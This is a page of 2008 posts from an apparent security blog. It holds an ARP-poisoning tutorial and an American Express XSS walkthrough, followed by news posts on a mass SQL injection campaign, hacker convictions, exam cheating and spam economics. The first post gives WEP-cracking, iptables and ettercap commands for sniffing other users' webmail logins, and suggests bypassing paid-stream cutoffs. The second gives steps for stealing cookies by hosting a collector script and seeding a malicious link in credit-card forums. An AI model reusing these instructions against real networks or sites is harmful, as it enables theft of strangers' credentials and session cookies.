Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Cyber Crime

A small and quick introduction to ARP poisoning

with 2 comments

This article won’t be about something new nor something extraordinary for any experienced computer security or even the average hacker, but since I’ve been ask this question quite often by some of my friends, I decided to explain how to sniff passwords from a network.  Moreover, I’m well aware I haven’t been writing anything for a while, and I want to get back to it once all my personal matters are resolved. I’ll concentrate on WEP wireless networks since they are almost certain to be cracked easily. Although those a deprecated, there are still used in many household as the out-of-the-box default configuration, so it’s still pertinent in my opinion. Then I will explain the ARP (Address Resolution Protocol) poisoning attack, which will be used to intercept packets between the target and the Internet.

Attacking the WEP wireless network

Packets in a WEP network are encryted, so in order to sniff packets off from it, you’ll first need to acquire the WEP key. This can be done easily with a wireless network adapter that supports monitor mode and the aircrack suite. For the adapter, I’m using the Linksys  Compact Wireless-G USB adapter, model no WUSB54GC. Plug your adapter into a USB connector and boot up your machine. Once you have booted up, make sure Backtrack or any other distribution has detected your adapter:

ifconfig rausb0 up

and then put the adapter in “Monitor Mode”

iwconfig rausb0 mode monitor

The goal of a WEP attack is to capture as many initialization vectors (IVs) as possible. IVs are random numbers used with a either 64, 128 and 256-bit key to encrypt a stream cipher. Those are used so that two exact same plain text do not produce the same ciphertext. The problem with WEP is that IVs are very short, and on a busy network, the same vectors get reused quickly. The IV is 24 bit long, therefore there are 16 777 216 possibilities1. Moreover, changing the IV for each packet is optional. The keys are also quite short, therefore opening the possibility of finding the key with some brute force calculation. No matter what is they key length, you will just need more packets.

The WEP protocol then use the randomly generated IV, the WEP key and pass it throught the RC4 cipher to produce a keystream. The keystream is then XORed with the plain text stream to produce the cipher text, as shown in the picture below:

WEP Encryption Schema

WEP Encryption Schema (from Wikipedia)

So basically, if you get many packets with the same Ivs, different ciphertext, you can now try to brute-force the WEP key. And to get those packets, you need traffic on the network. Now if there are already some people connected and surfing the web, you can easily capture packets and replay them to get more IVs, otherwise, you need to generate the traffic yourself.

Once you’ve tell airodump to capture IVs, we will use aireplay to generate more traffic, and therefore capture more IVs quickly. If you look at the airodump screen, you’ll see it capturing packets.

Once you have the key, you can finally start the poisoning process. As you have seen, I have not detailed how to crack a WEP network as it is widely described all over the net. You can find find good video tutorials from InfinityExists here and here. The last 2600 issue also had a good article about it.

The ARP poisoning attack

The concept behind this is simple. ARP is the protocol that maintains network devices tables up-to-date by associating an IP address with a MAC address. The problem with ARP is that it doesn’t really care about who answered, it will gladly update the tables from whoever says so. Most of the time, it won’t even ask. So the idea behind the attack, is to send the client an ARP answer saying “hey, I’m the gateway, send stuff to me” and a second ARP answer to the real gateway saying “hey there, I’m this guy, send me his stuff”. Then you just have to relay the packets between the victim and the gateway.Those schemas are more simply to understand:

Schema of an ARP Poisoning Attack

Schema of an ARP Poisoning Attack

In Linux, the rerouting can be done using the following iptables commands:

iptables -t nat -A PREROUTING -i <interface> -p tcp –dport <port> -j REDIRECT –to-port <redirection port>

iptables -t nat -D PREROUTING -i <interface> -p tcp –dport <port> -j REDIRECT –to-port <redirection port>

I’m showing those commands because you can do a lot with those. Many web applications such as some Flash applications use RTMP (Real-time messaging protocol) to control web applications, which run locally.  Flash server send commands to the application using message. Using those commands, you can filter the packets send or receive from the Flash server. Simply use a sniffer first, then locate which packets you wish to drop, alter or whatever.

For example, some sites gives you samples of live music or videos for 30 seconds, then nag you to pay. Using a sniffer, analyze the traffic and find that RTMP Invoke packet that closes the connection with the server. Code a quick proxy that will let all packets go to the flash application except for the connection closing RTMP packet. Then use the commands above to redirect traffic to your proxy.

00 03 0d 4f c0 6d 00 11  20 a8 32 8b 08 00 45 00 …O.m..  .2…E.
00 b2 7e 52 40 00 78 06  d0 a1 50 4d 74 05 43 c1 ..~R@.x. ..PMt.C.
ab 3e 07 8f d0 d8 9b a6  b0 eb ea 61 49 3d 80 18 .>…… …aI=..
fe 4a 76 52 00 00 01 01  08 0a 00 ef a6 d0 02 43 .JvR…. …….C
f4 32 43 00 00 00 00 00  76 14 02 00 0f 63 6c 6f .2C….. v….clo
73 65 43 6f 6e 6e 65 63  74 69 6f 6e 00 00 00 00 seConnec tion….
00 00 00 00 00 05 02 00  57 32 30 38 20 46 72 65 …….. W208 Fre
65 63 68 61 74 20 61 63  74 69 76 69 74 79 20 74 echat ac tivity t
69 6d 65 6f 75 74 2e 20  49 66 20 79 6f 75 20 77 imeout.  If you w
65 72 65 20 61 20 6d 65  6d 62 65 72 2c 20 74 68 ere a me mber, th
65 20 66 72 65 65 20 63  68 61 74 20 77 6f 75 6c e free c hat woul
64 20 6e 6f 74 20 74 69  6d 65 20 6f 75 74 21 20 d not ti me out!

Example of a RTMP Invoke packet to close a connection.

Of course you could just use Ettercap, which does exactly what have been mentioned above. Start Ettercap with the following:

sudo ettercap -G -W 128:p:25AAAAC18DEADDADA433332B65

This will open the graphical interface (-G), that is if you have installed the GTK interface to Ettercap. -W specify to listen for wireless networks and to use a 128-bit key with key found earlier. I don’t know what the p is really for. You can also use the text mode.



Then select Sniffing > Unified Sniffing > select on which interface you want to sniff. Then start the sniffing: File > Start Sniffing. Now let’s specify which targets you wanna sniff. Go to Hosts > Scan for hosts. That will locate the hosts on the current network. Then popup the hosts list, Hosts > Show Hosts List.

Ettercap - Hosts Found on the Network

Ettercap - Hosts Found on the Network

On the list, add the router to target 2 and the hosts you wanna sniff to target 1. Only one step left: MITM > ARP poisoning.  Select Sniff Remote Connections > OK.

Ettercap ARP Poisoining Options

Ettercap ARP Poisoining Options

Then you wait for users to connect to pages like MySpace or Hotmail etc…and Ettercap will find out the sensitive information for you.

See also:

Wireless Networking, Praphul Chandra, Alan Bensky, Ron Olexa, Daniel Mark Dobkin, David A. Lide, Farid Dowla

RFC 826 – Ethernet Address Resolution Protocol, David C. Plummer, November 1982,

Wired Equivalent Protocol, Wikipedia,


A Quick Amex XSS

with one comment

Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.

The vulnerability was in the search engine of the site, which didn’t sanitized the input keywords. Therefore anyone could insert JavaScript into the search and use this to trick people into sending their cookies to the attacker.

All you need to do is

1)      Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)

2)      Create a script to save the stolen cookies into a file or database and put it online.

3)      Get the link of the malicious search link. The code snipplet needed to cause the search to inject JavaScript is:


Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:


So the link to use to lure people into sending their cookies would be something like:’’%2Bdocument.cookie%3C/script%3E

4)      Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)

Now this XSS have been fixed after it started to go public. This folk[1], who found the bug, had a particular hard time convincing Amex about this security problem.

A video of the simple exploit is available  at :

See also:

American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, (accessed on December 17, 2008)

[1] “Holistic Security”, Russ McRee, December 17, 2008 (accessed on December 17, 2008)

Written by Jonathan Racicot

December 17, 2008 at 4:32 pm

High-tech Cheating

leave a comment »

One man and a woman, Steve Lee and Rong Yang, were convicted last week to eight months of prison after helping two Chinese men cheat their immigration exams, according to a news report from the Metropolitan Police Service[1].  The duo was monitoring the examination from a vehicle outside the building with laptops, transmitters and other equipment.

“Lee and Yang were clearly involved in a sophisticated operation using some of the best surveillance technology available worth thousands of pounds. When we first arrived at the scene it was very confusing as to what exactly was going on.”

It’s hard to tell what was the “best surveillance technology available worth thousands of pounds” since no detailed equipment list was given, but we might expect this to be largely exaggerated. The report states that Zhuang, the examinee, was given “tiny buttonhole cameras sewn in, a microphone and a small ear piece”. With this equipment, the information was transmitted back to Lee and Yang, who told Zhuang the answers to the questions.

“Best surveillance equipment” found into the car

“Best surveillance equipment” found into the car

I decided to look the equipment needed to conduct such an operation. The following material can be found without looking very hard on the net:

· Wireless Button Camera – £226.37

· Wireless Microphone – £133.13

· Wireless Earpiece – £134

· Laptop – £429

· Wireless Router – £51

Total: £973.5

Unless I’m forgetting something worth more than £1000, this is far from being “thousands of pounds”. And I’m quite sure you can get these items cheaper if you look on eBay.

Anyway, the cheaters were caught after a member of the public reported seeing them sitting Lee and Yang in a silver BMW with wires running from under the hood to the inside the car.

According to Sergeant Dominic Washington who first responded to the call from the public, said:

“However, working with colleagues from across the borough and the Met we believe that we have uncovered an established criminal enterprise that may be in operation in other parts of the country.”

No, I don’t think so… but this might give ideas to the others. And why were there wires under the car?

[1] “Two convicted for immigration test scam”, Metropolitan Police Service, November 14, 2008, (accessed on November 17, 2008)

New Cyber Attack on the Way

leave a comment »

A new SQL Injection tool is being used to conduct a mass cyber attack on various servers across the net. It has already attacked websites such as, and[1]. Websense has observed around 1200 servers from Europe, Asia and the U.S containing the injection.

“Websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days along, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.[2]says an analyst from

The targeted websites are usually running an ASP engine and are hacked by using stolen accounts or using SQL injections. The injection add a javascript line at the end of the page: <script src=http://<domain>/h.js>, where <domain> is a domain redirecting to another server called Kaspersky Lab, which has first reported the attack[3], has identified 6 of those domains:


These servers will retrieve a javascript (h.js) from a Chinese server called, which will try various exploits against the victims. If one is found, it will install a variety of Trojans that will try to download even more downloaders, steal World of Warcraft accounts and other private information. All that is done without the user’s knowledge, and could be done from legitimate websites.

Don Jackson, director of threat intelligence for SecureWorks, is saying that his team is currently in talks with the developers of the tools in order to get a copy and reverse-engineer it. Jackson claims that the attacks looks like the same used by the Asprox botnet, but is less aggressive and stealthier. The tool also uses a digital rights management (DRM) system.

[1] “Relentless Web Attack Hard To Kill”, Kelly Jackson Higgins, DarkReading, November 11, 2008, (accessed on November 12, 2008)

[2] “Big Chinese Hack 2?”,, (accessed on November 13, 2008)

[3] Ibid.

Romanian Programmer Convicted of Hacking U.S Navy, NASA and Dept. of Energy

leave a comment »

Victor Faur, a Romanian accused of hacking the U.S Navy, NASA and Department of Energy systems between 2005 and 2006 have been accused of illegally breaking into unauthorized computer systems.

Victor Faur, found guilty of hacking into NASA, Dept. of Energy and U.S. Navy systems

Victor Faur, found guilty of hacking into NASA, Dept. of Energy and U.S. Navy systems

At the end of a 10 months trial, the 28 years old computer programmer received a 16-month suspended prison sentence  and will have to pay 230 000$ to the 3 organizations. Victor Faur will have to pay to NASA 214,200 dollars, to the US Department of Energy 15,032 dollars and to the US Navy some 8,856 dollars[1].

Faur told the audience that he hacked into the system to expose the flaw, as he was part of a group called the “White Hat” team[2].

It is still unknown if Faur will face the same fate as British hacker Gary McKinnon[3], who fights extraditions to the U.S. At the beginning of the trial, Thom Mrozek, the U.S attorney’s spokesman, said that the hacker would face a trial in Los Angeles after the Romanian trial. If convicted in a US court, he could end up in jail for 54 years.

See also:

US Navy hacker avoids Romanian jail“, John Leyden, The Register, November 11, 2008 (accessed on November 11, 2008)

[1] “Romanian Victor Faur receives suspended sentence for illegally accessing NASA files”, HotNews, November 6, 2008, (accessed on November 11, 2008)

[2] “Romanian NASA hacker gets suspended sentence”, Associated Press, November 10, 2008, (accessed on November 11, 2008)

[3] “‘Hacker’ extradition case reopens”,  BBC News, February 14, 2006, (accessed on November 11, 2008)

How do Spammers Make Money?

leave a comment »

A very interesting article on the BBC discussed on how to spammers actually earn money with their system.

Many of us might have asked themselves the question on “why do spammers still sends their e-mails?”, or “how to they make money?” After all, most of computer users know about spam by now. Well it appears that even if spammers gets only one answer for 12.5 million e-mail sent[1], that’s all they need to make the big bucks. That’s what a team from the International Computer Science Institute found out in their paper “Spamalytics: An Empirical Analysis of Spam Marketing Conversion“.

The researchers hijacked a part of the Storm botnet, which used to be one of the biggest botnet around, and rewrote a part of the command and control module of the bot. In order to measure the success of the spam campaign, the team set up two websites, one being a fake Canadian pharmacy and another was postcard website, used to make the user download malware.

Overall, the computer scientists spawn 8 proxies and 75 869 worker bots[2]. They sent 469 million of spam emails, trying to convince the recipients to buy products from the fake online pharmacy. They also made sure to distinguish the visitors on their website by identifying crawlers and honey clients from genuine clients.

From the 350 million spams sent for the pharmacy website, for a period of 26 days, only 28 people went to visit the purchase page of the fake website[3].

Location of the victims that visited the postcard website (white/gray dots) and the 28 victims that went to the purchase page of the pharmacy.

According to the report:

Under the assumption that our measurements are representative over time (an admittedly dangerous assumption when dealing with such small samples), we can extrapolate that, were it sent continuously at the same rate, Storm-generated pharmaceutical spam would produce roughly 3.5 million dollars of revenue in a year. This number could be even higher if spam-advertised pharmacies experience repeat business. A bit less than “millions of dollars every day”, but certainly a healthy enterprise[5].

The report can be found here.

[1] “Study shows how spammers cash in”, BBC News, November 10, 2008, (accessed on November 10, 2008)

[2]Spamalytics: An Empirical Analysis of Spam Marketing Conversion“, Chris Kanich, Christian Kreibich, Kirill Levchenko, Brandon Enright, Geoffrey M. Voelker, Vern Paxson, Stefan Savage, International Computer Science Institute, 2008, p.6

[3] Ibid. p.11

[4] Ibid. p.9

[5] Ibid. p.11

Written by Jonathan Racicot

November 10, 2008 at 4:05 pm